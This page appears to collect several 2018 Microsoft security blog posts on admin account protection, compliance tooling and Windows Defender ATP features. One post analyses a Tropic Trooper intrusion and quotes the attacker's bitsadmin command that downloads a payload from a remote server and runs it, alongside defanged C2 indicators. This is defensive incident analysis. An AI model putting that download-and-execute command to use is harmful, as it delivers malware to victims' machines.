Alan Geller is a software architect in the Quantum Architectures and Computation group at Microsoft. He is responsible for the overall software architecture for Q# and the Microsoft Quantum Development Kit, as well as other aspects of the Microsoft Quantum software program.

Categories: Q#, Quantum, Visual Studio Tags:

Secure your privileged administrative accounts with a phased roadmap

November 29th, 2018 No comments

In my role, I often meet with CISOs and security architects who are updating their security strategy to meet the challenges of continuously evolving attacker techniques and cloud platforms. A frequent topic is prioritizing security for their highest value assets, both the assets that have the most business value today as well as the initiatives that the organization is banking on for the future. This typically includes intellectual property, customer data, key new digital initiatives, and other data that, if leaked, would do the greatest reputational and financial damage. Once we've identified the highest value assets, it inevitably leads to a conversation about all the privileged accounts that have administrative rights over these assets. Most of our customers recognize that you can no longer protect the enterprise just by securing the network edge; the cloud and mobile devices have permanently changed that. Identities represent the critically important new security perimeter in a dual-perimeter strategy while legacy architectures are slowly phased out.

Regardless of perimeter and architecture, there are few things more important to a secure posture than protecting admins. This is because a compromised admin account would cause a much greater impact on the organization than a compromised non-privileged user account.

If you are working on initiatives to secure your privileged accounts (and I hope you are!), this post is designed to help. I've shared some of the principles and tools that Microsoft has used to guide and enhance our own security posture, including some prescriptive roadmaps to help you plan your own initiatives.

Protect the privileged access lifecycle

Once you start cataloging all the high-value assets and who can impact them, it quickly becomes clear that we aren't just talking about traditional IT admins when we talk about privileged accounts. There are people who manage social media accounts rich with customer data, cloud services admins, and those who manage directories or financial data. All of these user accounts need to be secured (though most organizations start with IT admins first and then progress to others, prioritized based on risk or the ability to secure the account quickly).

Protecting the privileged access lifecycle is also more than just vaulting the credentials. Organizations need to take a complete and thoughtful approach to isolate the organization's systems from risks. It requires changes to:

  • Processes, habits, administrative practices, and knowledge management.
  • Technical components such as host defenses, account protections, and identity management.

Principles of securing privileged access

Securing all aspects of the privileged lifecycle really comes down to the following principles:

  • Strengthen authentication:

    • Move beyond relying solely on passwords, which are too often weak or easily guessed, and adopt a password-less, Multi-Factor Authentication (MFA) solution that uses at least two forms of authentication, such as a PIN, biometrics, and/or a code generated by a device.
    • Make sure you detect and remediate leaked credentials.

  • Reduce the attack surface:

    • Remove legacy/insecure protocols.
    • Remove duplicate/weak passwords.
    • Reduce dependencies.

  • Increase monitoring and detection.
  • Automate threat response.
  • Ensure usability for administrators.

To illustrate the importance we place on privileged access controls, I've included a diagram that shows how Microsoft protects itself. You'll see we have instituted traditional defenses for securing the network, as well as made extensive investments into development security, continuous monitoring, and processes to ensure we are looking at our systems with an attacker's eye. You can also see how we place a very high priority on security for privileged users, with extensive training, rigorous processes, separate workstations, as well as strong authentication.

Prioritize quick, high-value changes first using our roadmap

To help our customers get the most protection for their investment of time/resources, we have created prescriptive roadmaps to kickstart your planning. These will help you plan out your initiatives in phases, so you can knock out quick wins first and then incrementally increase your security over time.

Check out the Azure Active Directory (Azure AD) roadmap to plan out protections for the administration of this critical system. We also have an on-premises roadmap focused on Active Directory admins, which I've included below. Since many organizations run hybrid networks, we will soon merge these two roadmaps.

On-premises privileged identity roadmap

There are three stages to secure privileged access for an on-premises AD.

Stage 1 (30 days)

Stage 1 of the roadmap is focused on quickly mitigating the most frequently used attack techniques of credential theft and abuse.

1. Separate accounts: This is the first step to mitigate the risk of an internet attack (phishing attacks, web browsing) from impacting administrative privileges.

2 and 3. Unique passwords for workstations and servers: This is a critical containment step to protect against adversaries stealing and re-using password hashes for local admin accounts to gain access to other computers.

4. Privileged access workstations (PAW) stage 1: This reduces internet risks by ensuring that the workstations admins use every day are protected at a very high level.

5. Identity attack detection: Ensures that security operations have visibility into well-known attack techniques on admins.

Stage 2 (90 days)

These capabilities build on the mitigations from the 30-day plan and provide a broader spectrum of mitigations, including increased visibility and control of administrative rights.

1. Require Windows Hello for business: Replace hard-to-remember and easy-to-hack passwords with strong, easy-to-use authentication for your admins.

2. PAW stage 2: Requiring separate admin workstations significantly increases the security of the accounts your admins use to do their work. This makes it extremely difficult for adversaries to get access to your admins and is modeled on the systems we use to protect Azure and other sensitive systems at Microsoft (described earlier).

3. Just in time privileges: Lowers the exposure of privileges and increases visibility into privilege use by providing them to admins as they need it. This same principle is applied rigorously to admins of our cloud.

4. Enable credential guard on Windows 10 workstations: This isolates secrets for legacy authentication protocols like Kerberos and NTLM on all Windows 10 user workstations to make it more difficult for attackers to operate there and reach the admins.

5. Leaked credentials 1: This enables you to detect a risk of a leaked password by synchronizing password hashes to Azure AD where it can compare them to known leaked credentials.

6. Lateral movement vulnerability detection: Discover which sensitive accounts in your network are exposed because of their connection to non-sensitive accounts, groups, and machines.

Stage 3: Proactively secure posture

These capabilities build on the mitigations from previous phases and move your defenses into a proactive posture. While there will never be perfect security, this represents the strongest protections against privilege attacks currently known and available today.

1. Review role-based access control: Protect identity and management systems using a set of buffer zones between full control of the environment (Tier 0) and the high-risk workstation assets that attackers frequently compromise.

2. PAW stage 3: Expands your protection by separating internet risks (phishing attacks, web browsing) from all administrative privileges, not just AD admins.

3. Lowers the attack surface of domain and domain controller: This hardens these sensitive assets to make it difficult for attackers to compromise them with classic attacks like unpatched vulnerabilities and exploiting configuration weaknesses.

4. Leaked credentials 2: This steps up the protection of admin accounts against leaked credentials by forcing a reset of passwords using conditional access and self-service password reset (versus requiring someone to review the leaked credentials reports and manually take action).

Securing your administrative accounts will reduce your risk significantly. Stay tuned for the hybrid roadmap, which will be completed in early 2019.

The post Secure your privileged administrative accounts with a phased roadmap appeared first on Microsoft Secure.

Categories: cybersecurity Tags:

Windows Defender ATP device risk score exposes new cyberattack, drives Conditional access to protect networks

November 28th, 2018 No comments

Several weeks ago, the Windows Defender Advanced Threat Protection (Windows Defender ATP) team uncovered a new cyberattack that targeted several high-profile organizations in the energy and food and beverage sectors in Asia. Given the target region and verticals, the attack chain, and the toolsets used, we believe the threat actor that the industry refers to as Tropic Trooper was likely behind the new attack.

The attack set off numerous Windows Defender ATP alerts and triggered the device risk calculation mechanism, which labeled the affected machines with the highest risk. The high device risk score put the affected machines at the top of the list in Windows Defender Security Center, which led to the early detection and discovery of the attack.

With the high risk determined for affected machines, Conditional access blocked these machines' access to sensitive content, protecting other users, devices, and data in the network. IT admins can control access with Conditional access based on the device risk score to ensure that only secure devices have access to enterprise resources.

Finally, automatic investigation and remediation kicked in, discovered the artifacts on affected machines that were related to the breach, and remediated the threat. This sequence of actions ensured that the attackers no longer had a foothold on affected machines, returning the machines to a normal working state. Once the threat was remediated, the risk score for those machines was reduced and Conditional access restrictions were lifted.

Investigating alert timelines and process trees

We discovered the attack when Windows Defender ATP called our attention to alerts flagging several different suspicious activities, like abnormal Office application activity, dubious cross-process injections, and machine-learning-based indications of anomalous execution flows. The sheer volume and variety of the alerts told us something serious was going on.

Figure 1. Multiple alerts triggered by the attack

The first detection related to the attack was fired by a suspicious EQNEDT32.exe behavior, which led us to the entry vector of the attack: a malicious document that carried an exploit for CVE-2018-0802, a vulnerability in Microsoft Office Equation Editor, which the actor known as Tropic Trooper has exploited in previous campaigns.

Through the tight integration between Windows Defender ATP and Office 365 ATP, we were able to use Office 365 ATP Threat Explorer to find the specific emails that the attackers used to distribute the malicious document.

Using Windows Defender Security Center, we further investigated the detected executable and found that the attackers used bitsadmin.exe to download and execute a randomly named payload from a remote server:

bitsadmin /transfer Cd /priority foreground http://<IP address>:4560/.exe %USERPROFILE%\fY.exe && start %USERPROFILE%\fY.exe

Machine timeline activity showed that the executed payload communicated to a remote command-and-control (C&C) server and used process hollowing to run code in a system process memory.

In some cases, the attacker ran additional activities using malicious PowerShell scripts. Windows Defender ATP's Antimalware Scan Interface (AMSI) sensor exposed all the attacker scripts, which we observed were meant mostly for data exfiltration.

Figure 2. Process tree

Using the timeline and process tree views in Windows Defender Security Center, we were able to identify the processes exhibiting malicious activities and pinpoint exactly when they occurred, allowing us to reconstruct the attack chain. As a result of this analysis, we were able to determine a strong similarity between this new attack and the attack patterns used by the threat actor known as Tropic Trooper.

Figure 3. Campaign attack chain

Device risk calculation and incident prioritization

The alerts that were raised for this attack resulted in a high device risk score for affected machines. Windows Defender ATP determines a device risk score based on different mechanisms. The score is meant to raise the risk level of machines with true positive alerts that indicate a potential targeted attack. The high device risk score pushed the affected machines to the top of the queue, helping ensure that security operations teams would immediately notice and prioritize them. More importantly, elevated device risk scores trigger automatic investigation and response, helping contain attacks early in their lifespan.

In this specific attack, the risk calculation mechanism gave the affected machines the highest risk score based on cumulative risk. Cumulative risk is calculated from the multiple components and multiple types of anomalous behavior exhibited by an attack across the infection chain.
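Windows Defender ATP's actual scoring is internal to the product. Purely to illustrate the idea of cumulative risk, one common pattern is to treat each alert's severity as an independent contribution, so that risk rises with every additional anomalous behavior but never exceeds the maximum (the function and formula below are our illustration, not Microsoft's algorithm):

```python
def cumulative_risk(alert_severities):
    """Illustrative only -- not Windows Defender ATP's scoring.

    Combine per-alert severities in [0, 1] so each new alert raises the
    total without it ever exceeding 1:  risk = 1 - prod(1 - s_i).
    """
    risk = 0.0
    for s in alert_severities:
        risk = 1.0 - (1.0 - risk) * (1.0 - s)
    return risk
```

Under this toy model, several medium-severity alerts across an infection chain push a machine's risk toward the top of the queue, matching the behavior described above.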

Windows Defender ATP-driven conditional access

When Windows Defender ATP raises the device risk score for machines, as in this attack, the affected devices are marked as being at high risk. This risk score is immediately communicated to Conditional access, resulting in the restriction of access from these devices to corporate services and data managed by Azure Active Directory.

This integration between Windows Defender ATP and Azure Active Directory through Microsoft Intune ensures that attackers are immediately prevented from gaining access to sensitive corporate data, even if attackers manage to establish a foothold on networks. When the threat is remediated, Windows Defender ATP drops the device risk score, and the device regains access to resources. Read more about Conditional access here.

Signal sharing and threat remediation across Microsoft Threat Protection

In this attack investigation, the integration of Windows Defender ATP and Office 365 ATP allowed us to trace the entry vector, and it lets security operations teams seamlessly pivot between the two services to investigate the end-to-end timeline of an attack.

Threat signal sharing across services through the Intelligent Security Graph ensures that threat remediation is orchestrated across Microsoft Threat Protection. In this case, Office 365 ATP blocked the related email and malicious document used in the initial stages of the attack. Office 365 ATP had determined the malicious nature of the emails and attachment at the onset, stopping the attack at its entry point and protecting Office 365 ATP customers.

This threat signal is shared with Windows Defender ATP, adding to the rich threat intelligence that was used for investigation. Likewise, Office 365 ATP consumes intelligence from Windows Defender ATP, helping make sure that malicious attachments are detected and related emails are blocked.

Meanwhile, as mentioned, the integration of Windows Defender ATP and Azure Active Directory ensured that affected devices were not allowed to access sensitive corporate data until the threat was resolved.
Windows Defender ATP, Office 365 ATP, and Azure Active Directory are just three of the many Microsoft services now integrated through Microsoft Threat Protection, an integrated solution for securing identities, endpoints, user data, cloud apps, and infrastructure.


The new device risk calculation mechanism in Windows Defender ATP raised the priority of various alerts that turned out to be related to a targeted attack, exposing the threat and allowing security operations teams to immediately take remediation actions. Additionally, the elevated device risk score triggered automated investigation and response, mitigating the attack at its early stages.

Through Conditional access, compromised machines are blocked from accessing critical corporate assets. This protects organizations from the serious risk of attackers leveraging compromised devices to perform cyberespionage and other types of attacks.

To test how these and other advanced capabilities in Windows Defender ATP can help your organization detect, investigate, and respond to attacks, sign up for a free trial.



Hadar Feldman and Yarden Albeck
Windows Defender ATP team



Indicators of attack (IoCs)

Command and control IP addresses and URLs:

  • 199[.]192[.]23[.]231
  • 45[.]122[.]138[.]6
  • lovehaytyuio09[.]om

Files (SHA-256):

  • 9adfc863501b4c502fdac0d97e654541c7355316f1d1663b26a9aaa5b5e722d6 (size: 190696 bytes, type: PE)
  • 5589544be7f826df87f69a84abf478474b6eef79b48b914545136290fee840fe (size: 727552 bytes, type: PE)
  • 073884caf7df8dafc225567f9065bbf9bf8e5beef923655d45fe5b63c6b6018c (size: 195123 bytes, type: docx)
  • 1aef46dcbf9f0b5ff548f492685d488c7ac514a24e63a4d3ed119bfdbd39c908 (size: 207444 bytes, type: docx)




Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.


The post Windows Defender ATP device risk score exposes new cyberattack, drives Conditional access to protect networks appeared first on Microsoft Secure.

Categories: cybersecurity Tags:

How to help maintain security compliance

November 26th, 2018 No comments

This is the last post in our eight-blog series on deploying Intelligent Security scenarios. To read the previous entries, check out the Deployment series page.

Image taken at the Microsoft Ignite Conference.

Your employees need to access, generate, and share organizational information ranging from extremely confidential to informal; you must ensure that all information, and the movement of that information, complies with industry standards without inhibiting workflow. Microsoft 365 security solutions can help you know what's happening with your data, set permissions and classifications, and discover and help prevent leaks.

How can I make it easier to manage compliance processes?

To better manage compliance processes, the first thing you'll want to do is distribute the work to compliance specialists across your organization. The Microsoft 365 Security & Compliance Center (Figure 1) makes this easy by providing a central location to assign people to specific compliance tasks, such as data loss prevention, eDiscovery, and data governance.

Figure 1: The Microsoft 365 Security & Compliance Center Dashboard.

Next, you'll need to decide on the policies and data classifications that will allow you to take action on data. To streamline this compliance task, Microsoft Advanced Data Governance offers automatic data classification and proactive policy recommendations, such as retention and deletion policies, throughout the data lifecycle. You can enable default system alerts to identify data governance risks, for example, detecting an employee deleting a large volume of files. You can also create custom alerts by specifying alert-matching conditions, thresholds, or other activities that require admin attention.
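As a rough illustration of how a threshold-based custom alert works conceptually, consider the "employee deleting a large volume of files" example. Real alert policies are configured in the portal, not in code, and the activity names and field layout below are hypothetical:

```python
# Conceptual sketch of a threshold-style custom alert: count a matching
# activity per user over a window of audit events and flag users who
# exceed the configured threshold.

from collections import Counter

def evaluate_alert(events, activity="FileDeleted", threshold=100):
    """Return the users whose count of `activity` events exceeds `threshold`."""
    counts = Counter(e["user"] for e in events if e["activity"] == activity)
    return [user for user, n in counts.items() if n > threshold]

events = [{"user": "alice", "activity": "FileDeleted"}] * 150 \
       + [{"user": "bob", "activity": "FileDeleted"}] * 10
print(evaluate_alert(events))  # → ['alice']
```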

How do I assess data protection controls in an ever-changing compliance landscape?

The Microsoft Security Compliance Manager (Figure 2) provides tools to proactively manage evolving data privacy regulations. You can perform ongoing risk assessments on security, compliance, and privacy controls across 11 assessments, including these standards:

  • ISO 27001
  • ISO 27018
  • NIST 800-53

Plus, regional standards and regulations, including:

  • GDPR

As well as industry standards and regulations, such as:

  • NIST 800-171
  • FedRAMP Moderate
  • FedRAMP High

Additionally, the Compliance Manager provides step-by-step guidance on how to implement controls to enhance your compliance posture, and keeps you updated on the current compliance landscape. Built-in collaboration tools also help you assign, track, and record compliance activities to prepare for internal or external audits.

Figure 2: Compliance Manager provides tools to proactively manage evolving data privacy regulations.

How can I protect my data no matter where it lives or travels?

With employees, partners, and other users sharing your data over cloud services, mobile devices, and apps, you need solutions that understand what data is sensitive and automatically protect and govern that data. The unified labeling experience for Microsoft 365 in the Security & Compliance Center provides a tool that allows you to configure data sensitivity labels and protection policies across Azure Information Protection and Office 365 in one location (Figure 3). You can create and customize labels that define the sensitivity of the data. For example, a label of General means the file doesn't contain sensitive information, while Highly Confidential means the file contains very sensitive information. For each label, you can configure protection settings, such as adding encryption and access restrictions, or adding visual markings such as watermarks or headers/footers. To support data governance compliance, you can set policies for data retention, deletion, and disposition, and then automatically apply or publish these labels to users.

Figure 3: Configure data sensitivity labels and protection policies across Azure Information Protection and Office 365 in one location.

There are over 85 built-in sensitive information types that you can use to automatically detect common sensitive data types that may be subject to compliance requirements, such as credit card information, bank account information, passport IDs, and other personal data types. You can also create your own custom sensitive information types (such as employee ID numbers) or upload your own dictionary of terms that you want to automatically detect in documents and emails.
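Conceptually, a custom sensitive information type boils down to pattern matching over document and email content. The sketch below is purely illustrative, using a made-up employee ID format; real types are defined in the Security & Compliance Center, with confidence levels and supporting evidence, not in Python:

```python
# Illustration of the idea behind a custom sensitive information type:
# detect a (hypothetical) employee ID format "EMP-" followed by six digits.

import re

EMPLOYEE_ID = re.compile(r"\bEMP-\d{6}\b")  # invented pattern for illustration

def find_sensitive(text):
    """Return all employee-ID-shaped strings found in the text."""
    return EMPLOYEE_ID.findall(text)

doc = "Please update records for EMP-004217 and EMP-991003 by Friday."
print(find_sensitive(doc))  # → ['EMP-004217', 'EMP-991003']
```

A detection like this is what lets a data loss prevention policy act automatically, for example blocking an email that contains matches, without anyone labeling the content by hand.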

How can I help protect privileged accounts from compromise?

Controlling privileged access can reduce the risk of data compromise and help meet compliance obligations regarding access to sensitive data. Privileged access management (PAM) in Office 365 (Figure 4), available in the Microsoft 365 Admin Center, allows you to enforce zero standing access for your privileged administrative accounts. Zero standing access means users don't have privileges by default. When permissions are provided, it's at the bare minimum, with just enough access to perform the specific task. Users who need to perform a high-risk task must request permissions for access, and once access is granted, all activities are logged and auditable. It's the same principle that defines how Microsoft gives access to its datacenters, and it reduces the likelihood that a bad actor can gain access to your privileged accounts.

Figure 4: Privileged access management allows you to enforce zero standing access for your privileged administrative accounts.
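The zero standing access flow described above can be sketched as follows. This is a conceptual illustration only, not the Office 365 PAM API; the class and method names are invented:

```python
# Conceptual sketch of zero standing access: no default privileges; access
# is requested per task, granted at minimum scope, and every action
# (including denials) is logged for audit.

import time

class PrivilegedAccessManager:
    def __init__(self):
        self.grants = {}     # user -> the single task scope currently granted
        self.audit_log = []  # (timestamp, user, action) tuples

    def request_access(self, user, task):
        # A real system would require approval; here the grant is automatic.
        self.grants[user] = task
        self.audit_log.append((time.time(), user, f"granted:{task}"))

    def perform(self, user, task):
        if self.grants.get(user) != task:
            self.audit_log.append((time.time(), user, f"denied:{task}"))
            raise PermissionError("zero standing access: request access first")
        self.audit_log.append((time.time(), user, f"performed:{task}"))

pam = PrivilegedAccessManager()
pam.request_access("admin1", "export-mailbox")
pam.perform("admin1", "export-mailbox")  # allowed, and logged
```

The key property is that a user with no prior request cannot act at all, and the attempt itself leaves an audit trail.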

Plan for success with Microsoft FastTrack. FastTrack comes with your subscription at no additional charge. Whether you're planning your initial rollout, onboarding the product, or driving user adoption, FastTrack is a benefit service ready to assist you. Get started with FastTrack for Microsoft 365.

Want to learn more?

For more information and guidance on this topic, check out the white paper Maintain compliance with controls and visibility that adhere to global standards. You can find additional security resources on

Coming Soon! Stay tuned for our new series: Top 10 actions you can take with Microsoft 365 Security.


The post How to help maintain security compliance appeared first on Microsoft Secure.


What’s new in Windows Defender ATP

November 15th, 2018 No comments

Across Windows Defender Advanced Threat Protection (Windows Defender ATP) engineering and research teams, innovation drives our mission to protect devices in the modern workplace. Our goal is to equip security teams with the tools and insights to protect, detect, investigate, and automatically respond to attacks. We continue to be inspired by feedback from customers and partners, who share with us the day-to-day realities of security operations teams constantly keeping up with the onslaught of threats.

Today I'm excited to share with you some of the latest significant enhancements to Windows Defender ATP. We added new capabilities to each of the pillars of Windows Defender ATP's unified endpoint protection platform: improved attack surface reduction, better-than-ever next-gen protection, more powerful post-breach detection and response, enhanced automation capabilities, more security insights, and expanded threat hunting. These enhancements boost Windows Defender ATP and accrue to the broader Microsoft Threat Protection, an integrated solution for securing identities, endpoints, cloud apps, and infrastructure.

Let's look now at some of the new enhancements to Windows Defender ATP:

New attack surface reduction rules

Attack surface reduction forms the backbone of our answer to host intrusion prevention systems (HIPS). Attack surface reduction protects devices directly, by controlling and limiting the ways in which threats can operate on a device. Today we are announcing two new rules:

  • Block Office communication applications from creating child processes
  • Block Adobe Reader from creating child processes

These new rules allow enterprises to prevent child processes from being created by Office communication apps (including Outlook) and by Adobe Reader, right at the workstation level. These rules help eliminate many types of attacks, especially those using macros and vulnerability exploits. We have also added improved customization for exclusions and allow lists, which can work for folders and even individual files.

Emergency security intelligence updates

Emergency security intelligence updates are a new, super-fast delivery method for protection knowledge. In the event of an outbreak, the Windows Defender ATP research team can now issue an emergency request to all cloud-connected enterprise machines to immediately pull dedicated intelligence updates directly from the Windows Defender ATP cloud. This reduces the need for security admins to take action or wait for internal client update infrastructure to catch up, which often takes hours or even longer, depending on configuration. There's no special configuration for this other than ensuring that cloud-delivered protection is enabled on devices.

Top scores in independent industry tests

Machine learning and artificial intelligence drive our WDATP solution to block 5 billion threats every month and to consistently achieve top scores in independent industry tests: perfect scores in protection, usability, and performance test modules in the latest evaluation by AV-TEST; 99.8% protection rate in the latest real-world test by AV-Comparatives; and AAA accuracy rating in the latest SE Labs test.

We have added dedicated detections for cryptocurrency mining malware (coin miners) which have increasingly become a problem, even for enterprises. We have also increased our focus on detecting and disrupting tech support scams while they are happening.

Protecting our security subsystems using sandboxing

We've also continued to invest in hardening our platform to make it harder for malicious actors to exploit vulnerabilities and bypass the operating system's built-in security features. We've done this by putting Windows Defender ATP's antivirus in a dedicated sandbox. Sandboxing makes it significantly more difficult for an attacker to tamper with and exploit the antivirus solution as a means to compromise the device itself.

Evolving from individual alerts to Incidents

We are introducing Incidents, an aggregated view that helps security analysts to understand the bigger context of a complex security event. As attacks become more sophisticated, security analysts face the challenge of reconstructing the story of an attack. This includes identifying all related alerts and artifacts across all impacted machines and then correlating all of these across the entire timeline of an attack.

With Incidents, related alerts are grouped together, along with the machines involved and the corresponding automated investigations, presenting all collected evidence and showing the end-to-end breadth and scope of an attack. By transforming the queue from hundreds of individual alerts to a more manageable number of meaningful aggregations, Incidents eliminate the need to review alerts sequentially and to manually correlate malicious events across the organization, saving up to 80% of analyst time.

The Incident graph view shows the relations between the entities, with additional details in the side pane when you click an item.

Automating response for fileless attacks

We expanded automation in Windows Defender ATP to automatically investigate and remediate memory-based attacks, also known as fileless threats. We see more and more of these memory-based threats, and while we've had the optics to detect them, security analysts needed special investigation skills to resolve them. Windows Defender ATP can now leverage automated memory forensics to incriminate memory regions and perform required in-memory remediation actions.

With this new unique capability, we are shifting from simply alerting to a fully automated investigation and resolution flow for memory-based attacks. This increases the range of threats addressable by automation and further reduces the load on security teams.

Process injection automatically investigated and remediated

Threat analytics

Threat analytics is a set of interactive threat intelligence reports published by our research team as soon as emerging threats and outbreaks are identified. The Threat analytics dashboard provides a technical description of and data about a threat, and answers the key question, "Does WDATP detect this threat?" It also provides recommended actions to contain and prevent specific threats, as well as to increase organizational resilience.

But we don't stop there. We also provide an assessment of the impact of threats on your environment ("Am I hit?"), as well as a view of how many machines were protected ("Were you able to stop this?") and how many are exposed to the threat because they are not up to date or are misconfigured ("Am I exposed?").

Threat analytics dashboard

Custom detection rules

With Advanced hunting, security analysts love the power they now have to hunt for possible threats across their organization using flexible queries. A growing community of security researchers shares their queries with others through the GitHub community repository. These queries can now also be used as custom detection rules: an alert is automatically created and raised whenever a scheduled query returns results.

Creating custom detection rules from advanced hunting queries
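Mechanically, a custom detection rule is a saved hunting query run on a schedule, raising an alert whenever it returns results. In the sketch below a Python predicate stands in for the actual Kusto-based advanced hunting engine, so the event fields and rule are illustrative only:

```python
# Sketch of the custom detection rule mechanic: run a saved query over
# events on a schedule and raise an alert when it returns any matches.

def run_detection_rule(name, query, events):
    """Return an alert dict when the scheduled query matches any events."""
    hits = [e for e in events if query(e)]
    if hits:
        return {"alert": name, "matches": len(hits)}
    return None  # no matches, no alert

# Example rule: flag PowerShell launched with an encoded command.
suspicious_ps = lambda e: e.get("process") == "powershell.exe" \
                          and "-EncodedCommand" in e.get("cmdline", "")

events = [
    {"process": "powershell.exe", "cmdline": "powershell.exe -EncodedCommand aGk="},
    {"process": "notepad.exe", "cmdline": "notepad.exe"},
]
print(run_detection_rule("Encoded PowerShell", suspicious_ps, events))
```

The same query an analyst uses interactively for hunting thus becomes a standing detector once scheduled, which is the appeal of the feature.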

Integration with Microsoft Information Protection

Windows Defender ATP now provides built-in capabilities for discovery and protection of sensitive data on enterprise endpoints. We have integrated with Azure Information Protection (AIP) Data Discovery, providing visibility to labeled files stored on endpoints. AIP dashboard and log analytics will include files discovered on Windows devices alongside device risk info from Windows Defender ATP, allowing customers to discover sensitive data at risk on Windows endpoints.

Windows Defender ATP can also automatically protect sensitive files based on their label. Through Office Security and Compliance Center (SCC) policy, Windows Defender ATP automatically enables Windows Information Protection (WIP) for files with labels that correspond to Office SCC policy.

Integration with Microsoft Cloud App Security

Windows Defender ATP uniquely integrates with Microsoft Cloud App Security to enhance the discovery of shadow IT in an organization as seen from enterprise endpoints. Windows Defender ATP provides a simplified rollout of Cloud App Security discovery as it feeds Cloud App Security with endpoints signals, reducing the need for collecting signals via corporate proxies and allowing seamless collection of signals even when endpoints are outside of the corporate network.

Through this integration, Microsoft Cloud App Security leverages Windows Defender ATP to collect traffic information about client-based and browser-based cloud apps and services being accessed from IT-managed Windows 10 devices. This seamless integration does not require any additional deployment and gives admins a more complete view of the usage of cloud apps and services in their organization.

Innovations that work for you today and the future

These new features in the Windows Defender Advanced Threat Protection unified security platform combine world-class expertise inside Microsoft with insightful feedback from you, our customers, for whom we built these solutions. We ask that you continue to engage and partner with us as we continue to evolve Windows Defender ATP.

You can test all new and existing features by signing up for a free 60-day, fully featured Windows Defender ATP trial. You can also test drive attack surface reduction and next-gen protection capabilities using the Windows Defender demo page, or run DIY simulations for features like Incidents, automated investigation and response, and others directly from the Windows Defender Security Center portal to see how these capabilities help your organization in real-world scenarios.

Meanwhile, the work to stay ahead of threats doesn't stop. You can count on the Windows Defender ATP team to continue innovating, learning from our own experiences, and partnering with you to empower you to confidently protect, detect, and respond to advanced attacks.



Moti Gindi
General Manager, Windows Cyber Defense





The post What’s new in Windows Defender ATP appeared first on Microsoft Secure.


The evolution of Microsoft Threat Protection, November update

November 13th, 2018 No comments

At Ignite 2018, we announced Microsoft Threat Protection, a comprehensive, integrated solution securing the modern workplace across identities, endpoints, user data, cloud apps, and infrastructure (Figure 1).

The foundation of the solution is the Microsoft Intelligent Security Graph, which correlates 6.5 trillion signals daily from email alone and enables:

  • Powerful machine learning developed by Microsoft's 3,500 in-house security specialists
  • Automation capabilities for enhanced hunting, investigation, and remediation, helping reduce the burden on IT teams
  • Seamless integration between disparate services

Figure 1: Microsoft Threat Protection provides an integrated solution securing the modern workplace

Today, we revisit some of the solution capabilities announced at Ignite and provide updates on significant enhancements made since September. Engineers across teams at Microsoft are collaborating to unlock the full, envisioned potential of Microsoft Threat Protection. Throughout this journey, we want to keep you updated on its development.

Services in Microsoft Threat Protection

Microsoft Threat Protection leverages the unique capabilities of different services to secure several attack vectors. Table 1 summarizes the services in the solution. As each individual service is enhanced, so too is the overall solution.

Attack vector: Identities

  • Azure Active Directory Identity Protection
  • Azure Advanced Threat Protection
  • Microsoft Cloud App Security

Attack vector: Endpoints

  • Windows Defender Advanced Threat Protection
  • Windows 10
  • Microsoft Intune

Attack vector: User data

  • Exchange Online Protection
  • Office 365 Advanced Threat Protection
  • Office 365 Threat Intelligence
  • Windows Defender Advanced Threat Protection
  • Microsoft Cloud App Security

Attack vector: Cloud apps

  • Exchange Online Protection
  • Office 365 Advanced Threat Protection
  • Microsoft Cloud App Security

Attack vector: Infrastructure

  • Azure Security Center, one solution to protect all your workloads, including SQL, Linux, and Windows, in the cloud and on-premises

Table 1: Services in Microsoft Threat Protection securing the modern workplace attack vectors

Strengthening identity security

By fully integrating Azure Active Directory Identity Protection (Azure AD Identity Protection) with Azure Advanced Threat Protection (Azure ATP) (Figure 2), Microsoft Threat Protection is able to strengthen identity security. Azure AD Identity Protection uses dynamic intelligence and machine learning to automatically protect against and detect identity attacks. Azure ATP is a cloud-powered service that leverages machine learning to help detect suspicious behavior across hybrid environments from various types of advanced external and insider cyberthreats. Integrating the two enables IT teams to manage identities and perform security operations functions through a unified experience that was previously impossible, and allows SecOps investigations of risky users across both products through a single pane of glass. We will start offering customers this integrated experience over the next few weeks.

Figure 2: Integrating Azure ATP with the Azure AD Identity Protection console

Enhanced security for the endpoint

Figure 3 illustrates how Microsoft Threat Protection addresses specific customer challenges.

Figure 3: Microsoft Threat Protection is built to address specific customer challenges

Automation is a powerful capability, promising greater control and shorter threat resolution times even as the digital estate expands. We recently demonstrated our focus on automation by adding automated investigation and remediation capabilities for memory-based (fileless) attacks in our industry-leading endpoint security service, Windows Defender Advanced Threat Protection (Windows Defender ATP). Now the service can leverage automated memory forensics to incriminate malicious memory regions and perform required in-memory remediation actions. This unique new capability enables a fully automated investigation and resolution flow for memory-based attacks, going beyond simply alerting and saving security teams the precious time of manual memory forensics.

Figure 4 shows the investigation graph of an ongoing investigation in the Windows Defender Security Center. To enable the new feature, run the Windows 10 October 2018 Update and enable preview features. The capability, released earlier this year, can now mark your alerts as resolved automatically once automation successfully remediates the threat.

Figure 4: Investigation graph of ongoing investigation in Windows Defender Security Center

Elevating user data and cloud app security

Microsoft Threat Protection secures user data by leveraging Office 365 threat protection services, including Office 365 Advanced Threat Protection (Office 365 ATP), which provides best-in-class security in Office 365 against advanced threats to email, collaboration apps, and Office clients. We recently launched Native Link Rendering (Figure 5) for both the Outlook client and the Outlook on the web application, enabling users to view the destination URL for links in email. This allows users to make an informed decision before clicking through. This feature was a highly requested capability from customers who educate users on spotting suspicious links in email, and we're excited to deliver on it. Office 365 ATP is the only email security service for Office 365 offering this powerful feature.

Figure 5: Native Link Rendering user experience in Office 365 ATP

Enhancements have also been made in securing cloud apps, beginning with the integration between Microsoft Cloud App Security and Windows Defender ATP. Now, Microsoft Cloud App Security leverages signals from Windows Defender ATP monitored endpoints, enabling discovery of and recovery from unsanctioned cloud service (shadow IT) usage. More recently, Microsoft Cloud App Security further helps reduce the impact of shadow IT by providing granular visibility into Open Authorization (OAuth) application permissions that have access to Office 365, G Suite, and Salesforce data. OAuth apps are a newer attack vector often leveraged in phishing attacks, where attackers trick users into granting access to rogue applications. In the managing apps view (Figure 6), admins see a full list of both the permissions granted to an OAuth app and the users granting those apps access. The permission level details help admins decide which apps users can continue to access and which will have access revoked.

Figure 6: Microsoft Cloud App Security apps permission management view

Experience the evolution of Microsoft Threat Protection

